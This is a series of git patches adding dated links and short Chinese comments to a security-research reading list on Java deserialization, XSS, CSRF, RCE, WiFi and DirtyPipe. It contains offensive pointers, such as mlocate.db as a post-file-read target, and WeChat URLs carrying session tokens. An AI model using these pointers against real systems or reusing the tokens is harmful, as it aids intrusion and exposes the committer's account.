@@ -220,3 +220,4 @@ + 2022/12/18 [Java使用 try catch会影响性能?](https://mp.weixin.qq.com/s/kkEGvMwaG6J1WrD_DWRRzg) **不会** + 2022/12/22 [How I was able to steal users credentials via Swagger UI DOM-XSS](https://medium.com/@M0X0101/how-i-was-able-to-steal-users-credentials-via-swagger-ui-dom-xss-e84255eb8c96) + 2022/12/22 [浅析自动绑定漏洞](https://xz.aliyun.com/t/128) [浅析自动绑定漏洞之Spring MVC](https://www.mi1k7ea.com/2020/02/12/%E6%B5%85%E6%9E%90%E8%87%AA%E5%8A%A8%E7%BB%91%E5%AE%9A%E6%BC%8F%E6%B4%9E%E4%B9%8BSpring-MVC/) [Spring MVC Autobinding漏洞实例初窥](https://xz.aliyun.com/t/1089) [Autobinding](https://github.com/Cryin/JavaID/blob/master/JAVA%E5%AE%89%E5%85%A8%E7%BC%96%E7%A0%81%E4%B8%8E%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1.md) **Autobinding漏洞,代码审计的时候可以关注@SessionAttributes,@ModelAttribute注解** ++ 2022/12/22 [渗透必备!文件读取漏洞的后利用姿势](https://mp.weixin.qq.com/s?__biz=MzUyMTA0MjQ4NA==&mid=2247539336&idx=1&sn=81cd9e896db0dc9febd9f44bfbb1c69c&chksm=f9e335d3ce94bcc5894e9a6309ec200b8761d8eaef611b07c21fffe01459c71b1f4b686486a0&mpshare=1&scene=23&srcid=1222fVGVLCHXZOEVl7ECdKpe&sharer_sharetime=1671640052561&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **/var/lib/mlocate/mlocate.db 文件比较有趣 centos默认有 ubu默认没有.** From 2281f68f8c506e035b182a1d1879b266d5ddb770 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 23 Dec 2022 19:59:39 +0800 Subject: [PATCH 152/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 4ca5bb7..e763ad3 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -221,3 +221,4 @@ + 2022/12/22 [How I was able to steal users credentials via Swagger UI DOM-XSS](https://medium.com/@M0X0101/how-i-was-able-to-steal-users-credentials-via-swagger-ui-dom-xss-e84255eb8c96) + 2022/12/22 [浅析自动绑定漏洞](https://xz.aliyun.com/t/128) [浅析自动绑定漏洞之Spring MVC](https://www.mi1k7ea.com/2020/02/12/%E6%B5%85%E6%9E%90%E8%87%AA%E5%8A%A8%E7%BB%91%E5%AE%9A%E6%BC%8F%E6%B4%9E%E4%B9%8BSpring-MVC/) [Spring MVC Autobinding漏洞实例初窥](https://xz.aliyun.com/t/1089) [Autobinding](https://github.com/Cryin/JavaID/blob/master/JAVA%E5%AE%89%E5%85%A8%E7%BC%96%E7%A0%81%E4%B8%8E%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1.md) **Autobinding漏洞,代码审计的时候可以关注@SessionAttributes,@ModelAttribute注解** + 2022/12/22 [渗透必备!文件读取漏洞的后利用姿势](https://mp.weixin.qq.com/s?__biz=MzUyMTA0MjQ4NA==&mid=2247539336&idx=1&sn=81cd9e896db0dc9febd9f44bfbb1c69c&chksm=f9e335d3ce94bcc5894e9a6309ec200b8761d8eaef611b07c21fffe01459c71b1f4b686486a0&mpshare=1&scene=23&srcid=1222fVGVLCHXZOEVl7ECdKpe&sharer_sharetime=1671640052561&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **/var/lib/mlocate/mlocate.db 文件比较有趣 centos默认有 ubu默认没有.** ++ 2022/12/23 [红队实录系列(三)-WiFi 近源攻击实战](https://mp.weixin.qq.com/s?__biz=MzkzNjM5MDYwNw==&mid=2247483774&idx=1&sn=8808bfa1445f6b516077a1af244b761f&chksm=c29e3bdef5e9b2c89e0b607a08f098fca261228079259472bef46c645d8a83d2e1ed955f9ffe&mpshare=1&scene=23&srcid=1223e1e52DqpkBFnt02jHE7R&sharer_sharetime=1671794034434&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From b90b5259a380a49f15aadf28ea88da6f73c028f0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 23 Dec 2022 21:39:48 +0800 Subject: [PATCH 153/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e763ad3..df3590f 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -222,3 +222,4 @@ + 2022/12/22 [浅析自动绑定漏洞](https://xz.aliyun.com/t/128) [浅析自动绑定漏洞之Spring MVC](https://www.mi1k7ea.com/2020/02/12/%E6%B5%85%E6%9E%90%E8%87%AA%E5%8A%A8%E7%BB%91%E5%AE%9A%E6%BC%8F%E6%B4%9E%E4%B9%8BSpring-MVC/) [Spring MVC Autobinding漏洞实例初窥](https://xz.aliyun.com/t/1089) [Autobinding](https://github.com/Cryin/JavaID/blob/master/JAVA%E5%AE%89%E5%85%A8%E7%BC%96%E7%A0%81%E4%B8%8E%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1.md) **Autobinding漏洞,代码审计的时候可以关注@SessionAttributes,@ModelAttribute注解** + 2022/12/22 [渗透必备!文件读取漏洞的后利用姿势](https://mp.weixin.qq.com/s?__biz=MzUyMTA0MjQ4NA==&mid=2247539336&idx=1&sn=81cd9e896db0dc9febd9f44bfbb1c69c&chksm=f9e335d3ce94bcc5894e9a6309ec200b8761d8eaef611b07c21fffe01459c71b1f4b686486a0&mpshare=1&scene=23&srcid=1222fVGVLCHXZOEVl7ECdKpe&sharer_sharetime=1671640052561&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **/var/lib/mlocate/mlocate.db 文件比较有趣 centos默认有 ubu默认没有.** + 2022/12/23 [红队实录系列(三)-WiFi 近源攻击实战](https://mp.weixin.qq.com/s?__biz=MzkzNjM5MDYwNw==&mid=2247483774&idx=1&sn=8808bfa1445f6b516077a1af244b761f&chksm=c29e3bdef5e9b2c89e0b607a08f098fca261228079259472bef46c645d8a83d2e1ed955f9ffe&mpshare=1&scene=23&srcid=1223e1e52DqpkBFnt02jHE7R&sharer_sharetime=1671794034434&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/12/23 [漫谈 JEP 290](https://xz.aliyun.com/t/10170) **总结的非常好,在weblogic中启动了全局的过滤器那么如果存在一个cve是jndi,能不能通过ldap打本地反序列化的方法去rce?不能!!!因为ldap打本地反序列化需要有一个gadget虽然weblogic中的gadget非常多但是都被黑名单过滤了又因为是全局过滤器所以在ldap这条路也不能用。除非用jndi......就又一直重复了。** From 30ecf7ac2f030fee93742e66a58f64d835b91a5f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 25 Dec 2022 13:53:42 +0800 Subject: [PATCH 154/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index df3590f..7198c30 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -223,3 +223,4 @@ + 2022/12/22 [渗透必备!文件读取漏洞的后利用姿势](https://mp.weixin.qq.com/s?__biz=MzUyMTA0MjQ4NA==&mid=2247539336&idx=1&sn=81cd9e896db0dc9febd9f44bfbb1c69c&chksm=f9e335d3ce94bcc5894e9a6309ec200b8761d8eaef611b07c21fffe01459c71b1f4b686486a0&mpshare=1&scene=23&srcid=1222fVGVLCHXZOEVl7ECdKpe&sharer_sharetime=1671640052561&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **/var/lib/mlocate/mlocate.db 文件比较有趣 centos默认有 ubu默认没有.** + 2022/12/23 [红队实录系列(三)-WiFi 近源攻击实战](https://mp.weixin.qq.com/s?__biz=MzkzNjM5MDYwNw==&mid=2247483774&idx=1&sn=8808bfa1445f6b516077a1af244b761f&chksm=c29e3bdef5e9b2c89e0b607a08f098fca261228079259472bef46c645d8a83d2e1ed955f9ffe&mpshare=1&scene=23&srcid=1223e1e52DqpkBFnt02jHE7R&sharer_sharetime=1671794034434&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/12/23 [漫谈 JEP 290](https://xz.aliyun.com/t/10170) **总结的非常好,在weblogic中启动了全局的过滤器那么如果存在一个cve是jndi,能不能通过ldap打本地反序列化的方法去rce?不能!!!因为ldap打本地反序列化需要有一个gadget虽然weblogic中的gadget非常多但是都被黑名单过滤了又因为是全局过滤器所以在ldap这条路也不能用。除非用jndi......就又一直重复了。** ++ [网络安全14:Struts2框架下Log4j2漏洞检测方法分析与总结](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484207&idx=1&sn=285b54a79e48db9a05816cab2e6afc27&chksm=c25fcc54f5284542c1b9abe870e0caa9f958f4da90723bd83292deed215c63c705b7b0bbfaff&mpshare=1&scene=23&srcid=1225r9kGcJN5evUgMo6ecUCC&sharer_sharetime=1671942359949&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己也find 一些** From ec064e1bd7cdbb212e57845800de22a5a1216c51 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 26 Dec 2022 14:20:43 +0800 Subject: [PATCH 155/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
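Review bot: the entry added in PATCH 154/257 starts directly with `+ [网络安全14:...` and has no `YYYY/MM/DD` prefix, while every neighbouring entry in the hunk begins with a date such as `2022/12/23`; add the date so the list stays consistent and can still be read chronologically.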
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 7198c30..99c7f33 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -224,3 +224,4 @@ + 2022/12/23 [红队实录系列(三)-WiFi 近源攻击实战](https://mp.weixin.qq.com/s?__biz=MzkzNjM5MDYwNw==&mid=2247483774&idx=1&sn=8808bfa1445f6b516077a1af244b761f&chksm=c29e3bdef5e9b2c89e0b607a08f098fca261228079259472bef46c645d8a83d2e1ed955f9ffe&mpshare=1&scene=23&srcid=1223e1e52DqpkBFnt02jHE7R&sharer_sharetime=1671794034434&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/12/23 [漫谈 JEP 290](https://xz.aliyun.com/t/10170) **总结的非常好,在weblogic中启动了全局的过滤器那么如果存在一个cve是jndi,能不能通过ldap打本地反序列化的方法去rce?不能!!!因为ldap打本地反序列化需要有一个gadget虽然weblogic中的gadget非常多但是都被黑名单过滤了又因为是全局过滤器所以在ldap这条路也不能用。除非用jndi......就又一直重复了。** + [网络安全14:Struts2框架下Log4j2漏洞检测方法分析与总结](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484207&idx=1&sn=285b54a79e48db9a05816cab2e6afc27&chksm=c25fcc54f5284542c1b9abe870e0caa9f958f4da90723bd83292deed215c63c705b7b0bbfaff&mpshare=1&scene=23&srcid=1225r9kGcJN5evUgMo6ecUCC&sharer_sharetime=1671942359949&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己也find 一些** ++ 2022/12/26 [第27篇:CSRF跨站请求伪造漏洞挖掘及绕过校验方法](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484515&idx=1&sn=eacea9e2e1636d27a4d122a8c28ca98d&chksm=c25fcb18f528420ee30ed8d48d76add6423c736408ce50f4723b7b4aa8213e7ad7d400c268ea&cur_album_id=2660130833605132289&scene=190#rd) **了解了解** From b79e592babf114fee514f1524b96ea132485502c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 26 Dec 2022 15:34:55 +0800 Subject: [PATCH 156/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 99c7f33..512d727 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -225,3 +225,4 @@ + 2022/12/23 [漫谈 JEP 290](https://xz.aliyun.com/t/10170) **总结的非常好,在weblogic中启动了全局的过滤器那么如果存在一个cve是jndi,能不能通过ldap打本地反序列化的方法去rce?不能!!!因为ldap打本地反序列化需要有一个gadget虽然weblogic中的gadget非常多但是都被黑名单过滤了又因为是全局过滤器所以在ldap这条路也不能用。除非用jndi......就又一直重复了。** + [网络安全14:Struts2框架下Log4j2漏洞检测方法分析与总结](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484207&idx=1&sn=285b54a79e48db9a05816cab2e6afc27&chksm=c25fcc54f5284542c1b9abe870e0caa9f958f4da90723bd83292deed215c63c705b7b0bbfaff&mpshare=1&scene=23&srcid=1225r9kGcJN5evUgMo6ecUCC&sharer_sharetime=1671942359949&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己也find 一些** + 2022/12/26 [第27篇:CSRF跨站请求伪造漏洞挖掘及绕过校验方法](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484515&idx=1&sn=eacea9e2e1636d27a4d122a8c28ca98d&chksm=c25fcb18f528420ee30ed8d48d76add6423c736408ce50f4723b7b4aa8213e7ad7d400c268ea&cur_album_id=2660130833605132289&scene=190#rd) **了解了解** ++ 2022/12/26 [API安全学习笔记](https://xz.aliyun.com/t/11977) [玩转graphQL](https://mp.weixin.qq.com/s/gp2jGrLPllsh5xn7vn9BwQ) **api的安全** From 90a97719fb1a4a01ed329cd3761c7dbecb932d6d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 27 Dec 2022 16:40:54 +0800 Subject: [PATCH 157/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 512d727..7c1f657 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -226,3 +226,4 @@ + [网络安全14:Struts2框架下Log4j2漏洞检测方法分析与总结](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484207&idx=1&sn=285b54a79e48db9a05816cab2e6afc27&chksm=c25fcc54f5284542c1b9abe870e0caa9f958f4da90723bd83292deed215c63c705b7b0bbfaff&mpshare=1&scene=23&srcid=1225r9kGcJN5evUgMo6ecUCC&sharer_sharetime=1671942359949&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己也find 一些** + 2022/12/26 [第27篇:CSRF跨站请求伪造漏洞挖掘及绕过校验方法](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484515&idx=1&sn=eacea9e2e1636d27a4d122a8c28ca98d&chksm=c25fcb18f528420ee30ed8d48d76add6423c736408ce50f4723b7b4aa8213e7ad7d400c268ea&cur_album_id=2660130833605132289&scene=190#rd) **了解了解** + 2022/12/26 [API安全学习笔记](https://xz.aliyun.com/t/11977) [玩转graphQL](https://mp.weixin.qq.com/s/gp2jGrLPllsh5xn7vn9BwQ) **api的安全** ++ 2022/12/27 [某厂商数据库审计系统前台RCE挖掘之旅](https://www.sec-in.com/article/2006) [amazon-redshift-jdbc-driver 任意代码执行漏洞](https://www.sec-in.com/article/896) From 5065bedf5af76a0892d971dcf9555ce75328d45f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 28 Dec 2022 13:03:35 +0800 Subject: [PATCH 158/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 7c1f657..ff8ff2c 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -227,3 +227,4 @@ + 2022/12/26 [第27篇:CSRF跨站请求伪造漏洞挖掘及绕过校验方法](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484515&idx=1&sn=eacea9e2e1636d27a4d122a8c28ca98d&chksm=c25fcb18f528420ee30ed8d48d76add6423c736408ce50f4723b7b4aa8213e7ad7d400c268ea&cur_album_id=2660130833605132289&scene=190#rd) **了解了解** + 2022/12/26 [API安全学习笔记](https://xz.aliyun.com/t/11977) [玩转graphQL](https://mp.weixin.qq.com/s/gp2jGrLPllsh5xn7vn9BwQ) **api的安全** + 2022/12/27 [某厂商数据库审计系统前台RCE挖掘之旅](https://www.sec-in.com/article/2006) [amazon-redshift-jdbc-driver 任意代码执行漏洞](https://www.sec-in.com/article/896) ++ 2022/12/28 [溯源实例-从OA到某信源RCE全0day渗透](https://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247502698&idx=1&sn=5bfb3124ea5e6dde0f75a16dcc0281c7&chksm=c04d4c54f73ac54284ab70eb074cca632f177ce7af61440cf6a9a47ac17b01ad9a105d6b14e0&subscene=236&key=65a52f471bc41d13b06f820a346368bbb4e4f5342b20850e7a77c8224a338af9d3257d5f4d1f771946ff2bde8a2de3838ef166f262aa3a96f7cae7c3b2581ca8a81e130ac03a98e20269c21b3c4388ce02a40367460b5486fa035d58e7973f7e0119cab28b07861b0c03315d5c1285da188ec1b0bfbe37e35ee05af34397a18e&ascene=7&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308011a&lang=zh_CN&exportkey=n_ChQIAhIQp5liK4%2FGWZqVL2Un7OelRxLgAQIE97dBBAEAAAAAAG3xIKrEpowAAAAOpnltbLcz9gKNyK89dVj01MV50uZ2yoWxvdVPBS6nWl9mhSxXxZU6TC1EzeR8twNAtjlPlR%2BlkVNUUWtnUyuEkRgAsssOTDpaTQW1DGrprZEvTAgVXo3NoSI2Wz%2F9eScz2ACkvqF2rDsjp7WCVYF2Hl06xyJpJrlMNtn8AFjdPRh2352Y5klVxQ7BEtppP0ymCCSvNXigWUp5r1efdCEt6C7IMr12jsU4QaBGzmIASwIwdPunj6oeyeww%2B27Awg4kpvYKMBxgCZR9&acctmode=0&pass_ticket=BZXHTJB745OK74KYAukYaeZngdGnH8T2IaWh7T7wSCXlPlkLM%2FrS4cixsrs5q4hv2Q3obpsbuOUcPLpKfDhtHA%3D%3D&wx_header=1&fontgear=2) **不错** From 03ca852697d7af343d590f5c535fa8b46d08e5ef Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 28 Dec 2022 13:11:58 +0800 Subject: [PATCH 159/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
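Review bot: the WeChat link added in PATCH 158/257 carries client and session parameters (`key=`, `uin=`, `pass_ticket=`, `exportkey=`, `devicetype=Windows+10+x64`) that the earlier mp.weixin.qq.com entries in this list do not have, and committing them records details of the committer's own client in a public README. Trim the URL to the `__biz`, `mid`, `idx` and `sn` parameters that the other entries use, and do the same for the similar link added in PATCH 159/257.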
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index ff8ff2c..6b0de79 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -228,3 +228,4 @@ + 2022/12/26 [API安全学习笔记](https://xz.aliyun.com/t/11977) [玩转graphQL](https://mp.weixin.qq.com/s/gp2jGrLPllsh5xn7vn9BwQ) **api的安全** + 2022/12/27 [某厂商数据库审计系统前台RCE挖掘之旅](https://www.sec-in.com/article/2006) [amazon-redshift-jdbc-driver 任意代码执行漏洞](https://www.sec-in.com/article/896) + 2022/12/28 [溯源实例-从OA到某信源RCE全0day渗透](https://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247502698&idx=1&sn=5bfb3124ea5e6dde0f75a16dcc0281c7&chksm=c04d4c54f73ac54284ab70eb074cca632f177ce7af61440cf6a9a47ac17b01ad9a105d6b14e0&subscene=236&key=65a52f471bc41d13b06f820a346368bbb4e4f5342b20850e7a77c8224a338af9d3257d5f4d1f771946ff2bde8a2de3838ef166f262aa3a96f7cae7c3b2581ca8a81e130ac03a98e20269c21b3c4388ce02a40367460b5486fa035d58e7973f7e0119cab28b07861b0c03315d5c1285da188ec1b0bfbe37e35ee05af34397a18e&ascene=7&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308011a&lang=zh_CN&exportkey=n_ChQIAhIQp5liK4%2FGWZqVL2Un7OelRxLgAQIE97dBBAEAAAAAAG3xIKrEpowAAAAOpnltbLcz9gKNyK89dVj01MV50uZ2yoWxvdVPBS6nWl9mhSxXxZU6TC1EzeR8twNAtjlPlR%2BlkVNUUWtnUyuEkRgAsssOTDpaTQW1DGrprZEvTAgVXo3NoSI2Wz%2F9eScz2ACkvqF2rDsjp7WCVYF2Hl06xyJpJrlMNtn8AFjdPRh2352Y5klVxQ7BEtppP0ymCCSvNXigWUp5r1efdCEt6C7IMr12jsU4QaBGzmIASwIwdPunj6oeyeww%2B27Awg4kpvYKMBxgCZR9&acctmode=0&pass_ticket=BZXHTJB745OK74KYAukYaeZngdGnH8T2IaWh7T7wSCXlPlkLM%2FrS4cixsrs5q4hv2Q3obpsbuOUcPLpKfDhtHA%3D%3D&wx_header=1&fontgear=2) **不错** ++ 2022/12/28 [Android 远程攻击面——WebView 
攻防](https://mp.weixin.qq.com/s?__biz=MzI0Njg4NzE3MQ==&mid=2247490611&idx=1&sn=837678e428d46cddf588c8d6fc8b7dfd&chksm=e9b93a5fdeceb349357bd2cdb290ae1c31e8e63b8f3c793ee24780fb5af9b68f95812ead9f13&subscene=236&key=fe7e74d3eacd7a65828a0ce0e318fdea2e2ccd9e009a21e3e4624d8991854c06c5b6cae849bc9e4e44533463ae99a2c32dc7b3d3d085a0504aa762fdf7d10e650e04f312a4af452e290c74eb09aa3b920b4d755383b4656815d50939776dae2b1a3708ed2dc80b61f0cb947562edf2c404fdbf88353b3da1a1ce7c0bb1e146b5&ascene=7&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308011a&lang=zh_CN&exportkey=n_ChQIAhIQkmMc3S%2BR4POkBz6WNBhgzhLgAQIE97dBBAEAAAAAAEt1Ay0JAV0AAAAOpnltbLcz9gKNyK89dVj0%2FvvQaNijZxhY4D5kpMxru76EYhQ6ux%2BmNJ7Yb0mAhoiwczAd6gUnkS6geo44uTYsLTCJdvSqGoJm%2BSlQc7QOaLOYE7M4J2tjl7BZZd1SDJly%2BY2r5Z%2FYGl80IKiMXYWDnQW8ghg2yu5p9x%2FqI7W0SMnmoSXYuSbFfwfBjlYDoTdQvk3PQ1qnRsRkwmFqr335CD7pLQeFal3FiaJ3JYIC%2BC8Rk6r9DGhatU5IRLe8o2EevyG35KnmpqW8&acctmode=0&pass_ticket=BZXHTJB745OK74KYAukYaeZngdGnH8T2IaWh7T7wSCU9NSOr5Ca%2Bl68ysc6dTAsgsjjNjYJt%2BpYHw6rW7dB9ag%3D%3D&wx_header=1&fontgear=2) **之后说不定遇到学习** From ed5ddcb089a34a498562bef0f1ba67790cfb2d25 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 28 Dec 2022 19:08:32 +0800 Subject: [PATCH 160/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 6b0de79..d230a63 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -229,3 +229,4 @@ + 2022/12/27 [某厂商数据库审计系统前台RCE挖掘之旅](https://www.sec-in.com/article/2006) [amazon-redshift-jdbc-driver 任意代码执行漏洞](https://www.sec-in.com/article/896) + 2022/12/28 [溯源实例-从OA到某信源RCE全0day渗透](https://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247502698&idx=1&sn=5bfb3124ea5e6dde0f75a16dcc0281c7&chksm=c04d4c54f73ac54284ab70eb074cca632f177ce7af61440cf6a9a47ac17b01ad9a105d6b14e0&subscene=236&key=65a52f471bc41d13b06f820a346368bbb4e4f5342b20850e7a77c8224a338af9d3257d5f4d1f771946ff2bde8a2de3838ef166f262aa3a96f7cae7c3b2581ca8a81e130ac03a98e20269c21b3c4388ce02a40367460b5486fa035d58e7973f7e0119cab28b07861b0c03315d5c1285da188ec1b0bfbe37e35ee05af34397a18e&ascene=7&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308011a&lang=zh_CN&exportkey=n_ChQIAhIQp5liK4%2FGWZqVL2Un7OelRxLgAQIE97dBBAEAAAAAAG3xIKrEpowAAAAOpnltbLcz9gKNyK89dVj01MV50uZ2yoWxvdVPBS6nWl9mhSxXxZU6TC1EzeR8twNAtjlPlR%2BlkVNUUWtnUyuEkRgAsssOTDpaTQW1DGrprZEvTAgVXo3NoSI2Wz%2F9eScz2ACkvqF2rDsjp7WCVYF2Hl06xyJpJrlMNtn8AFjdPRh2352Y5klVxQ7BEtppP0ymCCSvNXigWUp5r1efdCEt6C7IMr12jsU4QaBGzmIASwIwdPunj6oeyeww%2B27Awg4kpvYKMBxgCZR9&acctmode=0&pass_ticket=BZXHTJB745OK74KYAukYaeZngdGnH8T2IaWh7T7wSCXlPlkLM%2FrS4cixsrs5q4hv2Q3obpsbuOUcPLpKfDhtHA%3D%3D&wx_header=1&fontgear=2) **不错** + 2022/12/28 [Android 远程攻击面——WebView 
攻防](https://mp.weixin.qq.com/s?__biz=MzI0Njg4NzE3MQ==&mid=2247490611&idx=1&sn=837678e428d46cddf588c8d6fc8b7dfd&chksm=e9b93a5fdeceb349357bd2cdb290ae1c31e8e63b8f3c793ee24780fb5af9b68f95812ead9f13&subscene=236&key=fe7e74d3eacd7a65828a0ce0e318fdea2e2ccd9e009a21e3e4624d8991854c06c5b6cae849bc9e4e44533463ae99a2c32dc7b3d3d085a0504aa762fdf7d10e650e04f312a4af452e290c74eb09aa3b920b4d755383b4656815d50939776dae2b1a3708ed2dc80b61f0cb947562edf2c404fdbf88353b3da1a1ce7c0bb1e146b5&ascene=7&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308011a&lang=zh_CN&exportkey=n_ChQIAhIQkmMc3S%2BR4POkBz6WNBhgzhLgAQIE97dBBAEAAAAAAEt1Ay0JAV0AAAAOpnltbLcz9gKNyK89dVj0%2FvvQaNijZxhY4D5kpMxru76EYhQ6ux%2BmNJ7Yb0mAhoiwczAd6gUnkS6geo44uTYsLTCJdvSqGoJm%2BSlQc7QOaLOYE7M4J2tjl7BZZd1SDJly%2BY2r5Z%2FYGl80IKiMXYWDnQW8ghg2yu5p9x%2FqI7W0SMnmoSXYuSbFfwfBjlYDoTdQvk3PQ1qnRsRkwmFqr335CD7pLQeFal3FiaJ3JYIC%2BC8Rk6r9DGhatU5IRLe8o2EevyG35KnmpqW8&acctmode=0&pass_ticket=BZXHTJB745OK74KYAukYaeZngdGnH8T2IaWh7T7wSCU9NSOr5Ca%2Bl68ysc6dTAsgsjjNjYJt%2BpYHw6rW7dB9ag%3D%3D&wx_header=1&fontgear=2) **之后说不定遇到学习** ++ 2022/12/28 [CVE-2022-08475-DirtyPipe](https://mp.weixin.qq.com/s/irugqDGx3OdZylcSGlMfZg) **学习** From 378a2f2e002f3ae1a01fcbc90af3db7533b50752 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 29 Dec 2022 12:50:12 +0800 Subject: [PATCH 161/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 ++ 1 file changed, 2 insertions(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index d230a63..49fb0c7 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -230,3 +230,5 @@ + 2022/12/28 